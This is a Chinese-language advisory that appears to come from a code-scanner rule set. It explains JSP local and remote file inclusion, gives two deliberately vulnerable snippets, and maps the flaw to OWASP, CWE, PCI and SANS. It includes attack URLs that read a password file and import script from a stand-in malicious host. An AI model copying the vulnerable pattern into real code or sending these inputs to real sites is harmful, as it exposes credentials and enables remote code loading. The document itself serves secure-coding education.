如果允許未經驗證的用戶輸入控制動態包含在 JSP 中的文件,會導致惡意代碼的執行。
許多現代網絡編寫語言都能夠在一個封裝的文件內包含附加的源文件,從而使代碼可以重用和模塊化。這種能力經常用于賦予應用程序標準外觀(應用模板),因而,人們可以共享各種功能而不需要借助編譯的代碼,或將代碼分解成較小的更好管理的文件。各個包含文件都會作為主文件的一部分進行解析,并采用相同的方式來執行。當未驗證的用戶輸入控制了所包含文件的路徑時,就會發生 File inclusion 漏洞。
例 1:以下代碼是 Local File Inclusion 漏洞的示例。示例代碼采用了用戶指定的模板名稱,并將該名稱包含在要呈現的 JSP 頁面中。
...
<jsp:include page="<%= (String)request.getParameter(\"template\")%>">
...
specialpage.jsp?template=/WEB-INF/database/passwordDB
/WEB-INF/database/passwordDB 文件的內容在 JSP 頁面上呈現,從而對系統安全造成威脅。c:import 標簽將用戶指定的遠程文件導入當前的 JSP 頁面。
...
<c:import url="<%= request.getParameter("privacy")%>">
...
policy.jsp?privacy=http://www.malicioushost.com/attackdata.js
[1] Standards Mapping - OWASP Top 10 2010 - (OWASP 2010) A1 Injection
[2] Standards Mapping - OWASP Top 10 2004 - (OWASP 2004) A1 Unvalidated Input
[3] Standards Mapping - OWASP Top 10 2007 - (OWASP 2007) A3 Malicious File Execution
[4] Standards Mapping - Security Technical Implementation Guide Version 3 - (STIG 3) APP3510 CAT I, APP3600 CAT II
[5] Standards Mapping - Security Technical Implementation Guide Version 3.4 - (STIG 3.4) APP3510 CAT I, APP3600 CAT II
[6] Standards Mapping - Common Weakness Enumeration - (CWE) CWE ID 94, CWE ID 98
[7] Standards Mapping - Payment Card Industry Data Security Standard Version 1.2 - (PCI 1.2) Requirement 6.3.1.1, Requirement 6.5.3
[8] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 - (PCI 1.1) Requirement 6.5.1
[9] Standards Mapping - Payment Card Industry Data Security Standard Version 2.0 - (PCI 2.0) Requirement 6.5.8
[10] Standards Mapping - SANS Top 25 2009 - (SANS 2009) Risky Resource Management - CWE ID 094
[11] Standards Mapping - SANS Top 25 2010 - (SANS 2010) Risky Resource Management - CWE ID 098
[12] Standards Mapping - SANS Top 25 2011 - (SANS Top 25 2011) Risky Resource Management - CWE ID 829
[13] Standards Mapping - FIPS200 - (FISMA) SI